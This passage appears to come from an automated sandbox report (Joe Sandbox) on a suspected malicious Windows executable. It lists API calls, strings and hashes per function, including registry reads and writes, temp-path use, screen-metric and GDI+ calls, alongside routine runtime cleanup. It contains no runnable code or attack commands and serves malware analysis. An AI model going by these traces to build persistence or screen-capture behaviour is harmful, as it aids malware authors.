                                                                                • Opcode Fuzzy Hash: 9df3d8af041b0fb0acc834ca29a1e5c71ca3f6008ef4501e141ea45a13f3b2e7
                                                                                • Instruction Fuzzy Hash: 40212E31B42220A7DB318B649C48BEB77549F007B0F254122ED09A7391D778DD6185EF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0041FA9F: _free.LIBCMT ref: 0041FAC4
                                                                                • _free.LIBCMT ref: 0041FB25
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041FB30
                                                                                • _free.LIBCMT ref: 0041FB3B
                                                                                • _free.LIBCMT ref: 0041FB8F
                                                                                • _free.LIBCMT ref: 0041FB9A
                                                                                • _free.LIBCMT ref: 0041FBA5
                                                                                • _free.LIBCMT ref: 0041FBB0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 98f77ec76f06077eea1b448944ce58b2e1595b2dcddd0bbe47e22eb6b6d970be
                                                                                • Instruction ID: 7db1981eb10c6848579af11079a1b251f65c7d6744bb850638dfe207fe15f9b0
                                                                                • Opcode Fuzzy Hash: 98f77ec76f06077eea1b448944ce58b2e1595b2dcddd0bbe47e22eb6b6d970be
                                                                                • Instruction Fuzzy Hash: F3115171640B04AAD920B7B2CC47FCB77ACBF01744F40483EB29D66452EA7DFE9A8654
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00415428,?,?,004153F0,004053F0,00000000,?), ref: 00415448
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041545B
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00415428,?,?,004153F0,004053F0,00000000,?), ref: 0041547E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$k8A$mscoree.dll
                                                                                • API String ID: 4061214504-1057185992
                                                                                • Opcode ID: a9535ac66a763b308a31d4138c8bb1f9763dc39b12a82d4f91f4d3e5fd0fedcd
                                                                                • Instruction ID: 93cd4d47ae4807a0dea2803bf1306c5894c6702ed29c8782a01973fd758bbd38
                                                                                • Opcode Fuzzy Hash: a9535ac66a763b308a31d4138c8bb1f9763dc39b12a82d4f91f4d3e5fd0fedcd
                                                                                • Instruction Fuzzy Hash: 2FF08230700619FBDB219B50DD0EBDEBB64EB40756F544065E400E1160CB788E41DBD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(?,004053F0,00000000), ref: 0041B6CF
                                                                                • __fassign.LIBCMT ref: 0041B8AE
                                                                                • __fassign.LIBCMT ref: 0041B8CB
                                                                                • WriteFile.KERNEL32(?,004053F0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B913
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041B953
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B9FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                • String ID:
                                                                                • API String ID: 4031098158-0
                                                                                • Opcode ID: 08e37cde994ab4b2861b985a57b441a3579fb99d29fcabdfbae23d29dffb58b4
                                                                                • Instruction ID: 2e32cf8cbb31cd8a4d87d2b1394546002bfefaf27888080fef9c6c317270b517
                                                                                • Opcode Fuzzy Hash: 08e37cde994ab4b2861b985a57b441a3579fb99d29fcabdfbae23d29dffb58b4
                                                                                • Instruction Fuzzy Hash: F4D1AF75D002589FCF15CFA8C8809EDBBB5FF49314F28416AE855B7341D734A986CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strrchr
                                                                                • String ID: )eA
                                                                                • API String ID: 3213747228-3515632281
                                                                                • Opcode ID: 726a3731f3d1a623b43f67c8ec1a057b21e0b027d0b0235643cf91e72a356b92
                                                                                • Instruction ID: 11068d39e479d307aca2d306d83cb35325116a3226e96db2b89774d2a5522e5d
                                                                                • Opcode Fuzzy Hash: 726a3731f3d1a623b43f67c8ec1a057b21e0b027d0b0235643cf91e72a356b92
                                                                                • Instruction Fuzzy Hash: 10B12232A442559FDB11CF28CCC17EEBBA5EF55340F14816BE845EB341E2389D82CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,0041406B,00413ED9,004137E8), ref: 00414082
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00414090
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004140A9
                                                                                • SetLastError.KERNEL32(00000000,0041406B,00413ED9,004137E8), ref: 004140FB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 5f690417a4d93073dc2ddfa8e960542f9770d2d8b2a798eb6a614c7a7def726d
                                                                                • Instruction ID: b21969416d77e1b29b16e9000ac0bfa6b4b4161302a4f914558e1e3db552e73d
                                                                                • Opcode Fuzzy Hash: 5f690417a4d93073dc2ddfa8e960542f9770d2d8b2a798eb6a614c7a7def726d
                                                                                • Instruction Fuzzy Hash: 7E01B532708311AEE6282B767C45ADB2FA4EB89376320023FF310415F1EF594D81515D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • C:\Users\user\Desktop\0XzeMRyE1e.exe, xrefs: 0041E6CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                                • API String ID: 0-3537543806
                                                                                • Opcode ID: 08606478cca4a4e8cbb271a068d956524941749b31b1c26f750c243859c25db4
                                                                                • Instruction ID: 79b1058737ce2c5d38aef274ea7f4fa3d404dccc477c6380ee603407fea28683
                                                                                • Opcode Fuzzy Hash: 08606478cca4a4e8cbb271a068d956524941749b31b1c26f750c243859c25db4
                                                                                • Instruction Fuzzy Hash: 24219875200115AFEB20AF678C80CEB775CEF14368711452AFD3597291E739DCD28759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcsrchr
                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                • API String ID: 1752292252-4019086052
                                                                                • Opcode ID: edcb7d1334c83e997cfdc33898eaa9ea829e5d0e002e30df8c59506e4174cc1b
                                                                                • Instruction ID: caf01a802d43c64c85ac89c365af1449498949e573924e14e5e61919d03eb865
                                                                                • Opcode Fuzzy Hash: edcb7d1334c83e997cfdc33898eaa9ea829e5d0e002e30df8c59506e4174cc1b
                                                                                • Instruction Fuzzy Hash: 3601C437B04F26662A15111ABD02BEB53988BC1BB4B26002FF854E77C1EE8CDE8241DD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: api-ms-
                                                                                • API String ID: 0-2084034818
                                                                                • Opcode ID: c8935d85e1b31c46e1a1174e1707af6fd839fca0fb0ccfeeb0e85a842d495f94
                                                                                • Instruction ID: c2b076188eb65ea8417f9d1300db316326ccbcd46bfa2080d19ce09592b24d89
                                                                                • Opcode Fuzzy Hash: c8935d85e1b31c46e1a1174e1707af6fd839fca0fb0ccfeeb0e85a842d495f94
                                                                                • Instruction Fuzzy Hash: 3C11E931B01625ABC7318B649C40BEB3768DF807A4B150132ED15A7391D738ED8185ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 0041FA4E
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041FA60
                                                                                • _free.LIBCMT ref: 0041FA72
                                                                                • _free.LIBCMT ref: 0041FA84
                                                                                • _free.LIBCMT ref: 0041FA96
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: ffcb7e339d6f58cdd9430f30ebc546ac424bfc512fcaa4477e67a69edfe54657
                                                                                • Instruction ID: 9749b7b9d3777537a44073aa7246d8b77892835b137e1e7a204487acd73cd81a
                                                                                • Opcode Fuzzy Hash: ffcb7e339d6f58cdd9430f30ebc546ac424bfc512fcaa4477e67a69edfe54657
                                                                                • Instruction Fuzzy Hash: 12F04F32500640AB8624FB55E5C5CDB73E9BE45B50764283AF00CD7A00C72DFDC58A6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: *?
                                                                                • API String ID: 269201875-2564092906
                                                                                • Opcode ID: 1a118566d7b9c1792d628bceba5884c03f51c4864d507aadf7ed1925e037930a
                                                                                • Instruction ID: 2e6be4146ed0c14f6760326d915250fdf3e2379a913af30e144ae6873f70e423
                                                                                • Opcode Fuzzy Hash: 1a118566d7b9c1792d628bceba5884c03f51c4864d507aadf7ed1925e037930a
                                                                                • Instruction Fuzzy Hash: C5614275D00219AFDB14CF9AC8815EEFBF9FF48314B1481AAE855E7300D7759E818B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004120D0: Concurrency::cancel_current_task.LIBCPMT ref: 00412184
                                                                                  • Part of subcall function 00402150: RegOpenKeyExA.KERNEL32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
                                                                                  • Part of subcall function 00402150: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
                                                                                  • Part of subcall function 00402150: RegCloseKey.KERNEL32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
                                                                                  • Part of subcall function 00402150: RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 004024D9
                                                                                  • Part of subcall function 00402150: RegSetValueExA.KERNEL32(80000001,?,00000000,00000001,?,?), ref: 00402507
                                                                                  • Part of subcall function 00402150: RegCloseKey.ADVAPI32(80000001), ref: 00402510
                                                                                  • Part of subcall function 004059C0: GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 004059EF
                                                                                  • Part of subcall function 00402150: GdiplusStartup.GDIPLUS(?,?,00000000,?,?,?), ref: 0040261B
                                                                                  • Part of subcall function 00402150: GetDC.USER32(00000000), ref: 00402702
                                                                                  • Part of subcall function 00402150: RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 00402934
                                                                                  • Part of subcall function 00402150: GetSystemMetrics.USER32 ref: 00402977
                                                                                  • Part of subcall function 00402150: GetSystemMetrics.USER32 ref: 00402984
                                                                                • Sleep.KERNEL32(00057E40), ref: 00411561
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseMetricsOpenSystem$Concurrency::cancel_current_taskGdiplusPathQuerySleepStartupTemp
                                                                                • String ID: 425620883392$91CCA1C9$A2D594D46F67
                                                                                • API String ID: 711646717-2198538293
                                                                                • Opcode ID: f57d94578fe7450d8b48b207d61a7992097bc633d203e87cce2a52f2ad6ce156
                                                                                • Instruction ID: 63869cb1527a91b56dab2cda25ed586226e25b94ad6f08aac743f1ff6ea4e8ec
                                                                                • Opcode Fuzzy Hash: f57d94578fe7450d8b48b207d61a7992097bc633d203e87cce2a52f2ad6ce156
                                                                                • Instruction Fuzzy Hash: 5261287060430057C614F775CA47ADF765AAFC8348F40092FF85A932D2EBB8A6D482AB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 0042495E
                                                                                • _free.LIBCMT ref: 00424987
                                                                                • SetEndOfFile.KERNEL32(00000000,00420D75,00000000,004196CE,?,?,?,?,?,?,?,00420D75,004196CE,00000000), ref: 004249B9
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00420D75,004196CE,00000000,?,?,?,?,00000000), ref: 004249D5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 1547350101-0
                                                                                • Opcode ID: f5ed5f403144cb3ddac2718491528e7de449f2c352b69dd5001b577c3f3b1530
                                                                                • Instruction ID: 607962bd2128e7ecb6048fb6a153e7772fa54071f941759d89d4231ad064bfff
                                                                                • Opcode Fuzzy Hash: f5ed5f403144cb3ddac2718491528e7de449f2c352b69dd5001b577c3f3b1530
                                                                                • Instruction Fuzzy Hash: 3D41C6B2B002159ACB11ABBAED02B9F3765EF85364FA5011BF414E7291DA3CCDC1876D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004158B7: _free.LIBCMT ref: 004158C5
                                                                                  • Part of subcall function 0041F00B: WideCharToMultiByte.KERNEL32(004053F0,00000000,00432BE8,00000000,004053F0,004053F0,0041C017,?,00432BE8,?,00000000,?,0041BD86,0000FDE9,00000000,?), ref: 0041F0AD
                                                                                • GetLastError.KERNEL32 ref: 0041E09C
                                                                                • __dosmaperr.LIBCMT ref: 0041E0A3
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E0E2
                                                                                • __dosmaperr.LIBCMT ref: 0041E0E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                • String ID:
                                                                                • API String ID: 167067550-0
                                                                                • Opcode ID: 3899fcd3f4545824d9ff18734aba7d0df0bbbdbaff82c7257b062df7f10e334b
                                                                                • Instruction ID: 0c70d3aca0cef39eb9a29ac307fc778f48dc9d65445fcb359af35d0a646e8657
                                                                                • Opcode Fuzzy Hash: 3899fcd3f4545824d9ff18734aba7d0df0bbbdbaff82c7257b062df7f10e334b
                                                                                • Instruction Fuzzy Hash: B921D8756002356F9B206F678C80CEB7B6DEF08368710811EFD2587241DB79ECD28799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(004053F0,004053F0,00801F0F,0041BACD,?,004053F0,00432BE8,?,0041BF8C,004053F0,00000000,004053F0,004053F0,004053F0,00000000,00000000), ref: 0041A127
                                                                                • _free.LIBCMT ref: 0041A184
                                                                                • _free.LIBCMT ref: 0041A1BA
                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0041BF8C,004053F0,00000000,004053F0,004053F0,004053F0,00000000,00000000,?,004156F5,00000000,00432BE8), ref: 0041A1C5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                • Opcode ID: c6d2f7faec1302a8984ac48f5b8040a236e6801daff1b7f37c03390d42ea0944
                                                                                • Instruction ID: 6b26c6711c252156ee1dfe23aa24b723700890b6c59b0ba09d0145482a09ac52
                                                                                • Opcode Fuzzy Hash: c6d2f7faec1302a8984ac48f5b8040a236e6801daff1b7f37c03390d42ea0944
                                                                                • Instruction Fuzzy Hash: 9711CD323011017E961176755C85EEF22699BC1778F26023BF228922D1FE2D8CF6512E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00412EFB,00412EFB,?,0041643C,00419D5D,?,?,00413B2E,?,?,?,?,?,00412DCB,00412EFB,?), ref: 0041A27E
                                                                                • _free.LIBCMT ref: 0041A2DB
                                                                                • _free.LIBCMT ref: 0041A311
                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00413B2E,?,?,?,?,?,00412DCB,00412EFB,?,?,?,?), ref: 0041A31C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                • Opcode ID: d86183606558833a258a8b1a44417338b74b71098fd3d9173d067f0fd7ed4747
                                                                                • Instruction ID: 6126a1ec23173222e9bfab05e2a7c06efd6ba00d8804580b812b9ee115a34c54
                                                                                • Opcode Fuzzy Hash: d86183606558833a258a8b1a44417338b74b71098fd3d9173d067f0fd7ed4747
                                                                                • Instruction Fuzzy Hash: D411CA323021016ED61126759CC5AEF22699BC1778B26013AF52C922D1EB398CF6412E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041AAD1,00000000,?,00421435,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041A982
                                                                                • GetLastError.KERNEL32(?,00421435,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041AAD1,00000000,00000104,?), ref: 0041A98C
                                                                                • __dosmaperr.LIBCMT ref: 0041A993
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2398240785-0
                                                                                • Opcode ID: 748604d605cd6ccc69b3c356dec82e65bf5193aac2f05b809e60583c358c7701
                                                                                • Instruction ID: 99b852fdf7aa52a571a68d0fb4837d5ae73adb1b686a3a287b143e39858f47b9
                                                                                • Opcode Fuzzy Hash: 748604d605cd6ccc69b3c356dec82e65bf5193aac2f05b809e60583c358c7701
                                                                                • Instruction Fuzzy Hash: 64F06271201525BBCB211BA6CC04DABBF69EF443A03464516B519C6120DB35E8F2C7DA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041AAD1,00000000,?,004213C0,00000000,00000000,0041AAD1,?,?,00000000,00000000,00000001), ref: 0041A9EB
                                                                                • GetLastError.KERNEL32(?,004213C0,00000000,00000000,0041AAD1,?,?,00000000,00000000,00000001,00000000,00000000,?,0041AAD1,00000000,00000104), ref: 0041A9F5
                                                                                • __dosmaperr.LIBCMT ref: 0041A9FC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2398240785-0
                                                                                • Opcode ID: c698dd398631e7b5e058bd4ccf4c80ed7a51677e19e9c31fa609280208fbe4f7
                                                                                • Instruction ID: e90c3a47c04f69f8c3283b3cda49886e54d6b61fb129050996d886ab53f55159
                                                                                • Opcode Fuzzy Hash: c698dd398631e7b5e058bd4ccf4c80ed7a51677e19e9c31fa609280208fbe4f7
                                                                                • Instruction Fuzzy Hash: 2CF06231301115BB8B215FA6DE08C9BBF69EF443A03454516F518C6110CB35E8B2C7D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(004053F0,00000000,00432BE8,00000000,004053F0,?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0), ref: 00424DCC
                                                                                • GetLastError.KERNEL32(?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0,00000000,004053F0,?,0041BFB0,004053F0), ref: 00424DD8
                                                                                  • Part of subcall function 00424D9E: CloseHandle.KERNEL32(FFFFFFFE,00424DE8,?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0,00000000,004053F0), ref: 00424DAE
                                                                                • ___initconout.LIBCMT ref: 00424DE8
                                                                                  • Part of subcall function 00424D60: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00424D8F,004221EC,004053F0,?,0041BA5C,00000000,?,004053F0,00000000), ref: 00424D73
                                                                                • WriteConsoleW.KERNEL32(004053F0,00000000,00432BE8,00000000,?,004221FF,004053F0,00000001,004053F0,004053F0,?,0041BA5C,00000000,?,004053F0,00000000), ref: 00424DFD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: e6ed42e9dcef8d0bdb4e0254b1a8b2f08fb405fd5705a56b80d057d723c09720
                                                                                • Instruction ID: 0cc13d065ee9562ea82690d47d7b82c2f0896ceb846607bba80986283eb887b7
                                                                                • Opcode Fuzzy Hash: e6ed42e9dcef8d0bdb4e0254b1a8b2f08fb405fd5705a56b80d057d723c09720
                                                                                • Instruction Fuzzy Hash: A6F01236210124BBCF225FA1FC04A8F3F26FF85760B454025FA2895130D73199209BD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 00418A98
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 00418AAB
                                                                                • _free.LIBCMT ref: 00418ABC
                                                                                • _free.LIBCMT ref: 00418ACD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 50086bc83856b29656b0ece8d7704e3f04f792345031d19d6221faf59f2b188f
                                                                                • Instruction ID: fd34e3d3b8f1add97e935abd5073eef0e6781f19382a81a21b394bce4158e547
                                                                                • Opcode Fuzzy Hash: 50086bc83856b29656b0ece8d7704e3f04f792345031d19d6221faf59f2b188f
                                                                                • Instruction Fuzzy Hash: 52E04D70820A609B8A02BF22BC4188DBB75BB19B04750303BF41002279C73A5A92DF8C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,?,00000000), ref: 004056DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PathTemp
                                                                                • String ID: A4D2A1A693AA93$hPQC
                                                                                • API String ID: 2920410445-398287527
                                                                                • Opcode ID: 5bf5c21e2be614ab82f3f5f3a896203fb6bd4e5d22a4b5591fc08d45ba755d46
                                                                                • Instruction ID: df550c7eb2918b25f62d0ce81e9b540fa1cb3ffd44ed576d960a7f926b30a9ae
                                                                                • Opcode Fuzzy Hash: 5bf5c21e2be614ab82f3f5f3a896203fb6bd4e5d22a4b5591fc08d45ba755d46
                                                                                • Instruction Fuzzy Hash: 6BC13C71E001089BDF08EF68CD857EEBB76EF85304F50816DE804A73C5DB799A918B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 004122D2
                                                                                Strings
                                                                                Memory Dump Source
